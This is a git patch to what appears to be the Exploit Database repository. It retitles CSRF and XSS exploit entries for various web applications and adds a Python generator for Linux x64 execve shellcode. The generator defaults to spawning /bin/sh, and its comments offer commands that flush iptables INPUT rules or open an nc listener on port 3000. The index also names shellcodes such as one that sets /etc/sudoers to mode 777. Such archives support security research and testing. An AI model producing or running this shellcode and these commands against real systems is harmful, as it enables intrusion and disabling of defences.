From 3339727aed634716d142fa6eea3117542aedc8f0 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 12 Apr 2018 05:01:47 +0000 Subject: [PATCH] DB: 2018-04-12 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 2 changes to exploits/shellcodes Cobub Razor 0.7.2 - Cross Site Request Forgery WolfCMS 0.8.3.1 - Cross Site Request Forgery Cobub Razor 0.7.2 - Cross-Site Request Forgery WolfCMS 0.8.3.1 - Cross-Site Request Forgery KYOCERA Net Admin 3.4 - Cross Site Request Forgery - Add Admin Exploit KYOCERA Net Admin 3.4 - Cross-Site Request Forgery (Add Admin) iScripts SonicBB 1.0 - Reflected Cross-Site Scripting iScripts SonicBB 1.0 - Reflected Cross-Site Scripting (PoC) Wordpress Plugin Activity Log 2.4.0 - Stored Cross Site Scripting WUZHI CMS 4.1.0 - ‘Add Admin Account’ Cross-Site Request Forgery WUZHI CMS 4.1.0 - ‘Add User Account’ Cross-Site Request Forgery Wordpress Plugin Activity Log 2.4.0 - Stored Cross-Site Scripting WUZHI CMS 4.1.0 - Cross-Site Request Forgery (Add Admin User) WUZHI CMS 4.1.0 - Cross-Site Request Forgery (Add User) WordPress File Upload Plugin 4.3.2 - Stored Cross Site Scripting WordPress Plugin WordPress File Upload 4.3.3 - Stored XSS WordPress Plugin File Upload 4.3.2 - Stored Cross-Site Scripting WordPress Plugin File Upload 4.3.3 - Stored Cross-Site Scripting (PoC) Linux/x64 - x64 Assembly Shellcode (Generator) --- exploits/php/webapps/44418.txt | 2 +- files_exploits.csv | 18 +++---- files_shellcodes.csv | 1 + shellcodes/generator/44445.py | 96 ++++++++++++++++++++++++++++++++++ 4 files changed, 107 insertions(+), 10 deletions(-) create mode 100755 shellcodes/generator/44445.py diff --git a/exploits/php/webapps/44418.txt b/exploits/php/webapps/44418.txt index 5ae8edce3..94af94665 100644 --- a/exploits/php/webapps/44418.txt +++ b/exploits/php/webapps/44418.txt @@ -8,7 +8,7 @@ # Author Blog : http://nullnews.in # Vendor Homepage: http://www.wolfcms.org # Software Link: -https://bitbucket.org/wolfcms/wolf-cms-downloads/downloads/wolfcms-0.8.3.1.zip + # Affected Version: 0.8.3.1 # Category: WebApps # Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686 diff --git a/files_exploits.csv b/files_exploits.csv index 36eb432f3..748b2e346 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -39120,8 +39120,8 @@ id,file,description,date,author,type,platform,port 44408,exploits/php/webapps/44408.txt,"GetSimple CMS 3.3.13 - Cross-Site Scripting",2018-04-05,"Sureshbabu Narvaneni",webapps,php, 44413,exploits/hardware/webapps/44413.txt,"FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass",2018-04-06,"Noman Riffat",webapps,hardware, 44414,exploits/windows/webapps/44414.txt,"DotNetNuke DNNarticle Module 11 - Directory Traversal",2018-04-06,"Esmaeil Rahimian",webapps,windows, -44416,exploits/php/webapps/44416.txt,"Cobub Razor 0.7.2 - Cross Site Request Forgery",2018-04-06,ppb,webapps,php, -44418,exploits/php/webapps/44418.txt,"WolfCMS 0.8.3.1 - Cross Site Request Forgery",2018-04-09,"Sureshbabu Narvaneni",webapps,php, +44416,exploits/php/webapps/44416.txt,"Cobub Razor 0.7.2 - Cross-Site Request Forgery",2018-04-06,ppb,webapps,php, +44418,exploits/php/webapps/44418.txt,"WolfCMS 0.8.3.1 - Cross-Site Request Forgery",2018-04-09,"Sureshbabu Narvaneni",webapps,php, 44419,exploits/php/webapps/44419.txt,"Cobub Razor 0.7.2 - Add New Superuser Account",2018-04-09,ppb,webapps,php, 44420,exploits/php/webapps/44420.txt,"MyBB Plugin Recent Threads On Index - Cross-Site Scripting",2018-04-09,Perileos,webapps,php, 44421,exploits/php/webapps/44421.txt,"WolfCMS 0.8.3.1 - Open Redirection",2018-04-09,"Sureshbabu Narvaneni",webapps,php,80 @@ -39129,15 +39129,15 @@ id,file,description,date,author,type,platform,port 44425,exploits/php/webapps/44425.txt,"WordPress Plugin Simple Fields 0.2 - 0.3.5 - Local/Remote File Inclusion / Remote Code Execution",2018-04-09,"Graeme Robinson",webapps,php,80 44429,exploits/json/webapps/44429.txt,"CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution",2018-04-09,"RedTeam Pentesting",webapps,json, 44430,exploits/linux/webapps/44430.txt,"KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection",2018-04-09,LiquidWorm,webapps,linux, -44431,exploits/linux/webapps/44431.txt,"KYOCERA Net Admin 3.4 - Cross Site Request Forgery - Add Admin Exploit",2018-04-09,LiquidWorm,webapps,linux, +44431,exploits/linux/webapps/44431.txt,"KYOCERA Net Admin 3.4 - Cross-Site Request Forgery (Add Admin)",2018-04-09,LiquidWorm,webapps,linux, 44432,exploits/php/webapps/44432.txt,"Buddypress Xprofile Custom Fields Type 2.6.3 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php, 44433,exploits/php/webapps/44433.txt,"WooCommerce CSV-Importer-Plugin 3.3.6 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php, -44434,exploits/php/webapps/44434.txt,"iScripts SonicBB 1.0 - Reflected Cross-Site Scripting",2018-04-09,ManhNho,webapps,php, +44434,exploits/php/webapps/44434.txt,"iScripts SonicBB 1.0 - Reflected Cross-Site Scripting (PoC)",2018-04-09,ManhNho,webapps,php, 44435,exploits/php/webapps/44435.txt,"WordPress Plugin Google Drive 2.2 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php, 44436,exploits/php/webapps/44436.txt,"iScripts Easycreate 3.2.1 - Stored Cross-Site Scripting",2018-04-10,ManhNho,webapps,php, -44437,exploits/php/webapps/44437.txt,"Wordpress Plugin Activity Log 2.4.0 - Stored Cross Site Scripting",2018-04-10,"Stefan Broeder",webapps,php, -44439,exploits/php/webapps/44439.txt,"WUZHI CMS 4.1.0 - ‘Add Admin Account’ Cross-Site Request Forgery",2018-04-10,taoge,webapps,php, -44440,exploits/php/webapps/44440.txt,"WUZHI CMS 4.1.0 - ‘Add User Account’ Cross-Site Request Forgery",2018-04-10,taoge,webapps,php, +44437,exploits/php/webapps/44437.txt,"Wordpress Plugin Activity Log 2.4.0 - Stored Cross-Site Scripting",2018-04-10,"Stefan Broeder",webapps,php, +44439,exploits/php/webapps/44439.txt,"WUZHI CMS 4.1.0 - Cross-Site Request Forgery (Add Admin User)",2018-04-10,taoge,webapps,php, +44440,exploits/php/webapps/44440.txt,"WUZHI CMS 4.1.0 - Cross-Site Request Forgery (Add User)",2018-04-10,taoge,webapps,php, 44441,exploits/linux/webapps/44441.txt,"Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager - Invalid Access Control",2018-04-10,SlidingWindow,webapps,linux, -44443,exploits/php/webapps/44443.txt,"WordPress File Upload Plugin 4.3.2 - Stored Cross Site Scripting",2018-04-10,ManhNho,webapps,php, -44444,exploits/php/webapps/44444.txt,"WordPress Plugin WordPress File Upload 4.3.3 - Stored XSS",2018-04-10,ManhNho,webapps,php, +44443,exploits/php/webapps/44443.txt,"WordPress Plugin File Upload 4.3.2 - Stored Cross-Site Scripting",2018-04-10,ManhNho,webapps,php, +44444,exploits/php/webapps/44444.txt,"WordPress Plugin File Upload 4.3.3 - Stored Cross-Site Scripting (PoC)",2018-04-10,ManhNho,webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 0b0cbac92..0634f8535 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -873,3 +873,4 @@ id,file,description,date,author,type,platform 43463,shellcodes/linux_x86/43463.nasm,"Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)",2018-01-04,"Hashim Jawad",shellcode,linux_x86 44321,shellcodes/linux_x86/44321.c,"Linux/x86 - execve(/bin/sh) Shellcode (18 bytes)",2018-03-20,"Anurag Srivastava",shellcode,linux_x86 44334,shellcodes/linux_x86/44334.c,"Linux/x86 - EggHunter + Null-Free Shellcode (11 Bytes)",2018-03-23,"Anurag Srivastava",shellcode,linux_x86 +44445,shellcodes/generator/44445.py,"Linux/x64 - x64 Assembly Shellcode (Generator)",2018-04-11,0x4ndr3,shellcode,generator diff --git a/shellcodes/generator/44445.py b/shellcodes/generator/44445.py new file mode 100755 index 000000000..081b6950f --- /dev/null +++ b/shellcodes/generator/44445.py @@ -0,0 +1,96 @@ +#!/usr/bin/env python +# +# Features: +# - Linux shellcode x64 assembly code generation +# - stack based (smaller payload size) +# - execve based +# - supports long commands (meaning bigger than an x64 register - 64 bits) +# - supports long parameters (meaning bigger than an x64 register - 64 bits) +# - one command only (execve will alter the current memory proc and when it exits there's no continuation) +# - supports command with up to 8 parameters +# +# Instructions +# - requires full path to the command +# - only one command is supported due to execve transforming the current process into a new one, loosing all previous context (any other instructions that would have been executed) +# - after having the x64 generated assembly code: +# - copy paste it into a file (in a Linux environment) - example.nasm +# - execute: +# nasm -felf64 example.nasm -o example.o && ld example.o -o example +# +# Author: Andre Lima @0x4ndr3 +# https://pentesterslife.blog +# +######## + +command = "/bin/sh" +#command = "/sbin/iptables -F INPUT" +#command = "/bin/nc -lvp 3000" +#command = "/bin/echo 1 2 3 4 5 6 7 longparamparamparam" + +def tohex(val, nbits): + return hex((val + (1 << nbits)) % (1 << nbits)) + +code = "" +code += "global _start\n" +code += "section .text\n" +code += "\n" +code += "_start:\n" +code += "push 59\n" +code += "pop rax\n" +code += "cdq\n" +code += "push rdx\n" + +params = command.split(' ') +try: + params.remove('') # in case of multiple spaces in between params in the command - cleanup +except: # it throws an exception if it doesn't finds one + pass + +if len(params[0]) % 8 != 0: + command = "/"*(8-len(params[0])%8) + params[0] + +iters = len(command)/8 - 1 +while iters >= 0: + block = command[iters*8:iters*8+8] + code += "mov rbx, 0x" + block[::-1].encode("hex") + "\n" + code += "push rbx\n" + iters -= 1 + +code += "push rsp\n" +code += "pop rdi\n" + +aux_regs = ["r8","r9","r10","r11","r12","r13","r14","r15"] +i = 0 +params = params[1:] # remove first element - command itself. we just want the params +if len(params) > len(aux_regs): + print "More than " + str(len(aux_regs)) + " parameters... Unsupported." + exit(1) +for p in params: + code += "push rdx\n" + if len(p) % 8 != 0: + p += "\x00"*(8-len(p)%8) + iters = len(p)/8 -1 + while iters >= 0: # each param + block = p[iters*8:iters*8+8] + code += "mov rbx, 0x" + tohex(~int(block[::-1].encode("hex"),16),64)[2:2+16] + "\n" + code += "not rbx\n" + code += "push rbx\n" + iters -= 1 + code += "push rsp\n" + code += "pop " + aux_regs[i] + "\n" + i += 1 + +code += "push rdx\n" +code += "push rsp\n" +code += "pop rdx\n" + +while i>0: + i -= 1 + code += "push " + aux_regs[i] + "\n" + +code += "push rdi\n" +code += "push rsp\n" +code += "pop rsi\n" +code += "syscall\n" + +print code \ No newline at end of file